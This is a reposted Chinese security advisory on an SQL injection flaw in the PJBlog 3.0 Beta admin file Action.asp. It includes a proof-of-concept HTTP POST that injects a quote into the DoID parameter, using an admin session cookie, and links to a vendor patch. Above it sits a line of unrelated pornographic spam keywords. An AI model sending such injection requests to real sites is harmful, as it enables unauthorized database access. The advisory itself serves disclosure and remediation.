日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務時間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
PJBlog博客系統(tǒng)后臺Action.aspSQL注入缺陷

影響版本:

3.0 Beta漏洞描述:

PJBlog一套開源免費的中文個人博客系統(tǒng)程序,采用asp+Access的技術(shù),PJBlog同時支持簡繁中文,UTF-8編碼,相對于其他系統(tǒng),PJBlog具有相當高的運作效能以及更新率,也支持目前Blog所使用的新技術(shù)。
在文件control/ Action.aspp中。

變量moduleID,GetPlugName,KeyWordID,smilesID,LinkID,mem_ID,doCommID,selCommID,TagsID,DelCate沒有過濾放入sql語句導致注入漏洞的產(chǎn)生。

<*參考  無 *>

測試方法:

[www.sebug.net]

本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!POST /ConContent.asp HTTP/1.1

Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword,

application/vnd.ms-excel, application/vnd.ms-powerpoint, */*

Referer: http://127.0.0.1:103/ConContent.asp?Fmenu=Categories

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

UA-CPU: x86

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0; .NET CLR 2.0.50727)

Host: 127.0.0.1:103

Content-Length: 101

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: PJBlog3Setting=ViewType=normal;

PJBlog3=memRight=111111111111&memName=admin&memHashKey=01c1dc172188d12f917e6c2492e787d43ce0966c;

ASPSESSIONIDQAABRAAQ=LAJBLBADFALCDBPMDPHHNCGL; ASP.NET_SessionId=052531uhossk1155ks5dm245;CheckCode=4633B8B4FA46833C; ASPSESSIONIDCABCSCDT=ICDNLLBDEBHJHCMNKBICIECH;ASPSESSIONIDQABBRABQ=IPGLOPCDNGMADODNDNMDLALO

action=Skins&whatdo=delModule&DoID=1%27&Submit=%E4%BF%9D%E5%AD%98%E6%97%A5%E5%BF%97%E5%88%86%E7%B1%BB

SEBUG安全建議:

PJblog

目前廠商已經(jīng)發(fā)布了升級補丁以修復這個安全問題,請到廠商的主頁下載:

http://bbs.pjhome.net/thread-48122-1-1.html

【編輯推薦】

  1. 重新審視企業(yè)IPS的應用:防御SQL注入攻擊的利劍
  2. SQL注入攻擊及其防范檢測技術(shù)研究
  3. 安全技巧:學會檢查SQL注入式攻擊漏洞

新聞標題:PJBlog博客系統(tǒng)后臺Action.aspSQL注入缺陷
本文路徑:http://www.dlmjj.cn/article/djcispj.html